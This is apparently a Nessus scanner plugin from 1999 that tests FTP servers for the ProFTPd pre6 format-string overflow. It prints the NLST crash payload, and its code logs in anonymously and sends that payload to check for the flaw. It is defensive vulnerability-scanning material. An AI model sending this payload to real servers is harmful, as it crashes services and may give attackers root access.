#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
# 
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10191);
 script_cve_id("CAN-1999-0911");
 name["english"] = "ProFTPd pre6 buffer overflow";
 name["francais"] = "Dpassement de buffer dans ProFTP pre6";
 
 script_name(english:name["english"],
 	     francais:name["francais"]);
	     
 desc["english"] = "
It was possible to make the remote FTP server
crash by issuing this command :

	NLST aaaXXXX%u%[...]%u%u%u%%u%653300u%n
	
Where XXXX have ascii values 0xDC, 0x4F, 0x07 and 0x08.

This problem is known has the 'proftpd pre6' overflow and
may allow the remote user to gain root easily.

Solution : if you are using proftpd, then upgrade
to proftpd 1.2.0pre7. If you are using something else,
then upgrade or contact your vendor.

Risk factor : High
";
		 
		 
desc["francais"] = "
Il s'est avr possible de faire planter le serveur
FTP distant en lancant la commande :

NLST aaaXXXX%u%[...]%u%u%u%%u%653300u%n
	
O XXXX ont les valeurs ascii 0xDC, 0x4F, 0x07 et 0x08.

Ce problme est connu sous le nom de 'dpassement de buffer
proftpd pre6' et permet  un pirate de passer root sur
ce systme sans grande difficult.

Solution : si vous utilisez proftpd, alors mettez-le  jour
en version 1.2.0pre7. Sinon, informez votre vendeur de cette
vulnrabilit et demandez un patch.

Facteur de risque : elev
";	 	     
 script_description(english:desc["english"],
 		    francais:desc["francais"]);
		    
 
 script_summary(english:"Checks if the remote ftp can be buffer overflown",
 		francais:"Dtermine si le serveur ftp distant peut etre soumis  un dpassement de buffer");
 script_category(ACT_DENIAL);
 script_family(english:"FTP");
 script_family(francais:"FTP");
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
 		  francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
		  
 script_dependencie("find_service.nes",
 		    "wu_ftpd_overflow.nasl");
 script_require_keys("ftp/anonymous");		    
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#
# The script code starts here : 
#


# First, we need anonymous access
anon = get_kb_item("ftp/anonymous");
if(!anon)exit(0);




port = get_kb_item("Services/ftp");
if(!port)port = 21;

soc = open_sock_tcp(port);
if(soc)
{
 if(ftp_log_in(socket:soc, user:"anonymous", pass:"nessus@nessus.org"))
 {
 
  buf = raw_string("aaa", 0xdc, 0x4f, 0x07, 0x08);
  buf = buf + crap(data:"%u", length:72)  + "%653300u%n";
  c = string("NLST ", buf, "\r\n");
  send(socket:soc, data:c);
  b = recv(socket:soc, length:1024);
  if(!b)security_hole(port);
  close(soc);
 }
}

